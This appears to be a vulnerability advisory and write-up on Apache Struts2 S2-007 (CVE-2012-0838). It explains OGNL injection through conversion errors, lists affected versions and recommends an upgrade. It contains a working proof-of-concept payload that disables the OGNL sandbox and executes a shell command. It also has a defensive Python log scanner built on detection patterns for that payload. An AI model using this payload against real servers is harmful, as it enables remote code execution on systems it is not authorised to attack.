Catalog
1. Description
2. Affected Scope
3. Exploit Analysis
4. Principle Of Vulnerability
5. Patch Fix
1. Description
S2-007 shares the same root cause as S2-003 and S2-005: all three stem from a flaw in how struts2 parses OGNL, which lets an attacker inject and execute code through OGNL expressions. What differs is the attack vector:
1. S2-003, S2-005: code execution through OGNL's name-value assignment parsing and the # access to global static variables (AOP style)
2. S2-007: code execution through OGNL's String-to-long conversion // i.e. the attack vectors are different
User input is evaluated as an OGNL expression when there's a conversion error. This allows a malicious user to execute arbitrary code.
For background on struts2 OGNL, see this other article:
http://www.cnblogs.com/LittleHann/p/4614488.html // search for: 5. struts2 OGNL expressions
Relevant Link:
http://struts.apache.org/docs/s2-007.html
http://cve.scap.org.cn/CVE-2012-0838.html
2. Affected Scope
Struts 2.0.0 - Struts 2.2.3
3. Exploit Analysis
0x1: POC
id='%2b(%23_memberAccess.allowStaticMethodAccess=true,%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23cmd="ifconfig",%23ret=@java.lang.Runtime@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%23out=@org.apache.struts2.ServletActionContext@getResponse(),%23out.getWriter().println(%23echo))%2b'
4. Principle Of Vulnerability
Apache Struts 2 versions before 2.2.3.1 contain a vulnerability that stems from evaluating a string as an OGNL expression while handling a conversion error. A remote attacker can exploit this with invalid input to modify run-time data values and then execute arbitrary code.
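As an added defender-side example (not from the original post), the scanner below walks constructed access-log lines and flags query parameters that carry the OGNL markers used by the PoC above: the sandbox toggles, @class@method static calls, and the '+( ... )+' breakout from the quoted conversion value. The log lines, indicator names and action path are constructed for this example; note that a plain non-numeric id only triggers a conversion error and is not flagged on its own.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Markers from the S2-007 PoC: sandbox toggles, @class@method static calls, quote breakout.
INDICATORS = {
    "allowStaticMethodAccess": re.compile(
        r"#_memberAccess\s*\.\s*allowStaticMethodAccess\s*=\s*true", re.I),
    "denyMethodExecution=false": re.compile(
        r"#context\s*\[\s*['\"]xwork\.MethodAccessor\.denyMethodExecution['\"]\s*\]\s*=\s*false", re.I),
    "static_call": re.compile(r"@[A-Za-z_][\w.]*@\w+\s*\("),
    "quote_breakout": re.compile(r"'\s*\+\s*\(.*\)\s*\+\s*'", re.S),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed CLF-style log lines (not real traffic): line 2 is only a conversion error.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2015:10:00:00 +0000] "GET /user.action?id=42 HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2015:10:00:01 +0000] "GET /user.action?id=abc HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2015:10:00:02 +0000] "GET /user.action?id='%2b(%23_memberAccess.allowStaticMethodAccess%3Dtrue,%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse)%2b' HTTP/1.1" 200 512
10.0.0.8 - - [01/Jan/2015:10:00:03 +0000] "GET /user.action?id='%2b(%23out%3D@org.apache.struts2.ServletActionContext@getResponse())%2b' HTTP/1.1" 200 512
"""

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so nested encoding cannot hide markers."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request(target):
    """Return {param: [marker names]} for each query parameter that looks like OGNL."""
    hits = {}
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)          # parse_qsl already removed one encoding layer
        matched = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits

def scan_log(text):
    """Return [(line_no, client_ip, hits)] for log lines whose request carries OGNL markers."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m and (hits := scan_request(m.group(1))):
            findings.append((n, line.split()[0], hits))
    return findings
```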
5. Patch Fix
0x1: upgrade struts2
It is strongly recommended to upgrade to Struts 2.3.1.1, which contains the corrected classes.
Copyright (c) 2015 Little5ann All rights reserved
struts2 CVE-2012-0838 S2-007 Remote Code Execution
Original article: http://www.cnblogs.com/LittleHann/p/4640789.html